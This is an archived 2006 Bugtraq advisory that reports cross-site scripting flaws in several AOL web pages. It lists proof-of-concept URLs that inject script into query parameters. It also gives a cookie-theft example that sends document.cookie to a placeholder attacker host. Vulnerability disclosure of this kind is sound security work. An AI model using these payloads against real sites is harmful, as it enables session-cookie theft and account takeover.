lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3979.68.20.178.120.1136691905.squirrel@www.morx.org>
Date: Sun, 8 Jan 2006 03:45:05 -0000 (GMT)
From: simo@...x.org
To: bugtraq@...urityfocus.com
Subject: AOL Multiple Cross Site Scripting Vulnerability


Title: AOL Multiple Cross Site Scripting

Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
Discovered: 26 December 2005
Published: 7 January 2006
MorX Security Research Team
http://www.morx.org

Service: Web

Vendor: AOL.com

Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks

Severity: Medium/High

Tested on: Microsoft IE 6.0 and FireFox 5.1

Details:

AOL.com search engines are created with AOLserver Dynamic Pages (or ADP).
ADP are a set of web server extensions for designing dynamically created
documents. Utilizing AOLserver, ADP return a document to the user based on
running a set of Tcl code with arguments provided by the user. They are
based on Microsoft's own Active Server Pages. AIM.com ADP scripts are
prone to cross-site scripting attacks. This problem is due to a failure in
the applications to properly sanitize user-supplied input.

Impact:

an attacker can exploit the vulnerable scripts to have arbitrary script
code executed in the browser of an authentified AIM user in the context of
the AIM webpage. resulting in the theft of cookie-based authentication
giving the attacker temporary access to the victim's account (email box,
etc) as well as other type of attacks.

Screen captures:

http://www.morx.org/AOL-XSS.JPG
http://www.morx.org/AOL2-XSS.JPG

Affected scripts with proof of concept exploit:

http://peopleconnection.aol.com/dirmodule.adp?_did=55004"><script>alert('VULNERABLE')</script>&_dtype=csv&_dcookie=1&_dpath=pc_main,pc_main&_dsect=1#

http://health.aol.com/dirmodule.adp?_did=41623"><script>alert('VULNERABLE')</script>&_dtype=csv&_dcookie=0&_dpath=hlth_talk,hlth_talk&_dsect=1&dirHeader=Health%20Talk%20Directory#

http://health.aol.com/dirmodule.adp?_did=41623"><img%20src="http://www.morx.org/morx.png"%20</src>&_dtype=csv&_dcookie=0&_dpath=hlth_talk,hlth_talk&_dsect=1&dirHeader=Health%20Talk%20Directory#


http://aimtoday.aol.com/features/main_redesign.adp?fid=acct_linking"><script>alert('VULNERABLE')</script>

http://aolexpressions.aol.com/main.adp?expTypeId=1"><script>alert('VULNERABLE')</script>&clientId=2

http://aolexpressions.aol.com/search.adp?clientId=2&search=<script>alert('VULNERABLE')</script>

http://food.aol.com/food/recipefinder.dyn?action=howItWorks"><script>alert('VULNERABLE')</script>

Exemple of Cookie theft:

http://aolexpressions.aol.com/search.adp?clientId=2&search=<script>document.location='http://www.some-attacker-site/grab.php?cookie='+escape(document.cookie).substr(0,1900)</script>

Disclaimer:

this entire document is for eductional, testing and demonstrating purpose
only. Modification use and/or publishing this information is entirely on
your OWN risk. The information provided in this advisory is to be
used/tested on your OWN machine/Account. I cannot be held responsible for
any of the above.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ